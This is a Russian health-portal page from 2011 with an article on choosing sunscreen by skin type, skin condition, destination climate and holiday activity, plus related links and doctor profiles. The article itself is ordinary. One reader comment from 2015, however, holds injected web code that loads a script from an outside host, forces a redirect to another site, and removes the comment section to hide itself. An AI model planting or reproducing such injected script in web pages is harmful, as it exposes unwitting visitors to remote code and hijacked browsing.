Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Как правильно выбрать сол...  >>  Как правильно выбрать солнцезащитное средство
 
Обратная связь
 

Как правильно выбрать солнцезащитное средство

Размер шрифта
05 июля 2011 07:00
  • google_analytics: false
  • Нравится

Большинство людей при выборе солнцезащитного средства обращают внимание исключительно на SPF-фактор. Он указывает на уровень защиты кожи от ультрафиолетового излучения – низкий, средний, высокий или очень высокий (для детей, людей с чувствительной кожей). Однако это далеко не единственный критерий.

sun prio

Виктория Свиридова / «Здоровье инфо»

Выбирая в магазине косметические средства, защищающие от солнца, обратите внимание на такие параметры, как тип и особенности кожи, на который рассчитан крем или спрей, климатическая зона места, куда вы отправляетесь, а так же вид отдыха, который вы на этот раз выбираете (активный или пассивный).

Тип кожи

Специалисты выделяют несколько типов кожи: сухую, нормальную, комбинированную и жирную. Сухая постоянно нуждается в питании, поэтому ей больше подойдет кремовая, плотная текстура молочка. Для жирной или комбинированной (склонной к жирности в области Т-зоны) оптимальными будут флюид или гель. Для защиты нормальной кожи можно выбрать любую текстуру – все зависит от индивидуальных ощущений и предпочтений.

Также сейчас на косметическом рынке появилось солнцезащитное масло с высоким SPF-фактором (еще недавно выше десятки SPF на рынке не было). Оно быстро впитывается, абсолютно не липнет к телу, поэтому понравится без исключения всем людям, как с жирной, так и с сухой кожей.

Состояние кожи

Кожа постоянно подвергается негативному влиянию окружающей среды, стрессам, и ее состояние способно меняться. Поэтому в разные времена года она может быть обезвоженной, раздраженной, чувствительной. Причиной перемен могут стать в том числе банальная простуда или волнительное событие в жизни.

Если кожа шелушится и ей не хватает влаги, обратите внимание на средства с высоким содержанием активных увлажняющих компонентов. Если вы аллергик, или у вас повышенная чувствительность, подбирайте средства с очень высокой защитой (SPF 50+). Если на коже имеются ранки или повреждения (например, после бритья и эпиляции), то лучше в этот день стараться находиться в тени или прятаться под зонтом. Иначе могут появиться пигментные пятна, раздражение или воспаление.

Климатическая зона места отдыха

От того, куда вы направляетесь, зависит и степень SPF-защиты, которая вам необходима. Жаркие тропики Египта, субтропики Черноморского побережья России и Абхазии, Средиземноморье стран Европы и Турции – везде свои погодные особенности.

Еще утром вы, застегнувшись на все пуговицы, дрожали по дороге в аэропорт Новосибирска, и сейчас, приземлившись в Шарм-эль-Шейхе, не знаете, как избавиться от майки. Как раз для такого случая необходимо заранее приобрести крем с высокой степенью защиты, так как нагрузка для кожи при переезде из холодной климатической зоны в субтропическую может оказаться критической. Кожа обезвоживается, становится более чувствительной.

Собираясь на Средиземное море, можно взять защиту чуть пониже, например, SPF 20. Но так как летом на побережье светит очень яркое солнце, в начале отдыха старайтесь использовать SPF не ниже 30.

На Черное море берите защиту и того меньше. Однако все равно не забывайте про количество дней, проведенных на солнце.

Также важно обращать внимание на наличие у средства защиты от UVA-лучей – главных виновников старения кожи.

Вид отдыха

Если вы из тех, кто при заезде в отель первым делом бежит записываться на пляжный волейбол, а не заселяться в номер, тогда вам стоит обратить внимание на специальные защитные средства. Найти их несложно – почти во всех современных «солнечных» линиях есть спреи для занятий спортом и активного отдыха на открытом воздухе. Чаще всего они имеют текстуру нежирного лосьона, быстро и легко наносятся, а также устойчивы к воздействию воды и пота.

Если же вы любитель умиротворяющего «возлежания» под солнцем, и о том, чтобы подняться с шезлонга и сходить за очередным коктейлем вам даже подумать лень, тогда вам нужны солнцезащитные средства с особой текстурой для определенного типа кожи и ее особенностей.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:10

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как не умереть на пляже   Как не потерять мужа?   Некоторые солнцезащитные кремы ни от чего не защищают!   Солнечный ожог и его последствия  

Слайдшоу

1
Как пережить жару без кондиционера?! Солнцезащитный крем. Ошибки, которые делаете даже ВЫ!
Вы неправильно мажете крем Как справиться с волосами летом?
Как пережить поход на пляж? 12 привычек, которые делают вас старой!
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.